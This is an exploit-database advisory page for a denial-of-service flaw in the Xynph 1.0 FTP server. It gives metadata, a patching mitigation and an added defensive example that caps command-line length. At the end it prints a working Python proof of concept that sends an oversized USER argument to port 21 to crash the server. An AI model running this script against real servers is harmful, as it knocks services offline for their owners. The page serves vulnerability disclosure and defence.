Vendor: Xynph 1.0
By: freak_out
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 400
Product Name: Xynph 1.0
Affected Version From: 1
Affected Version To: 1
Patch Exists: Yes
Related CWE: N/A
CPE: a:xynph:xynph:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011

Xynph 1.0 USER Denial of Service Exploit

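This exploit sends an oversized argument (100,000 "A" characters in the proof of concept below) to the USER command of the Xynph 1.0 FTP server, causing the server to crash. The proof of concept is a Python script that is run from the command line with the target host as its only argument.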

Mitigation:

Ensure that the FTP server is running the latest version of Xynph 1.0 and that all security patches have been applied.
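As a complement to patching, the following added example (not code from the original page or from Xynph) shows one way an FTP server or an inline proxy can bound the length of control-channel lines before any command handler sees them. The 512-byte limit and the names `BoundedLineReader`, `LineTooLong` and `handle_stream` are assumptions chosen for illustration.

```python
# Added example: bounded reader for FTP control-channel lines.
# MAX_LINE and every name below are assumptions for illustration.
MAX_LINE = 512  # bytes per command line, CRLF included


class LineTooLong(Exception):
    """Raised when a control-channel line exceeds the limit."""


class BoundedLineReader:
    def __init__(self, max_line=MAX_LINE):
        self.max_line = max_line
        self.buf = bytearray()

    def feed(self, chunk):
        """Add received bytes and return the complete lines they finish.

        Raises LineTooLong as soon as a line passes the limit, even when its
        CRLF has not arrived, so the buffer holds at most limit + one chunk.
        """
        self.buf += chunk
        lines = []
        while True:
            end = self.buf.find(b"\r\n")
            if end == -1:
                if len(self.buf) > self.max_line:
                    raise LineTooLong(len(self.buf))
                return lines
            if end + 2 > self.max_line:
                raise LineTooLong(end + 2)
            lines.append(bytes(self.buf[:end]))
            del self.buf[:end + 2]


def handle_stream(chunks, max_line=MAX_LINE):
    """Return what a server would record for the given received chunks."""
    reader, replies = BoundedLineReader(max_line), []
    for chunk in chunks:
        try:
            for line in reader.feed(chunk):
                # Record the verb only, never the argument (PASS carries a secret).
                verb = line.split(b" ", 1)[0].upper().decode("ascii", "replace")
                replies.append("accepted " + verb)
        except LineTooLong:
            replies.append("500 Line too long")  # reply, then close the socket
            break
    return replies


# Constructed input: a normal login split across two TCP reads, then a
# USER line with a 100000-byte argument delivered in 4 KiB chunks.
ok = [b"USER alice\r\nPA", b"SS secret\r\n"]
big = b"USER " + b"A" * 100000 + b"\r\n"
oversized = [big[i:i + 4096] for i in range(0, len(big), 4096)]
```

The oversized line is rejected on the first chunk, before its terminating CRLF is ever received, which is the property that keeps the per-connection buffer bounded.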
Source

Exploit-DB raw data:

# Exploit Title: Xynph 1.0 USER Denial of Service Exploit
# Date: 04.01.2011
# Author: freak_out
# Version: 1.0
# Tested on: Windows XP SP3
# Type: DOS/POC
# Greetings: anco, mahjong, puddy, st!x, war10ck, fraggle, DarthShredder, krzym, starslayer, db
# E-Mail: freak_out@phcn.de

#DoS:
#!/usr/bin/python
import socket
import sys

buf = "A"*100000
host = sys.argv[1]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,21))
print "Send USER " + buf
s.send("USER %s\r\n" % buf)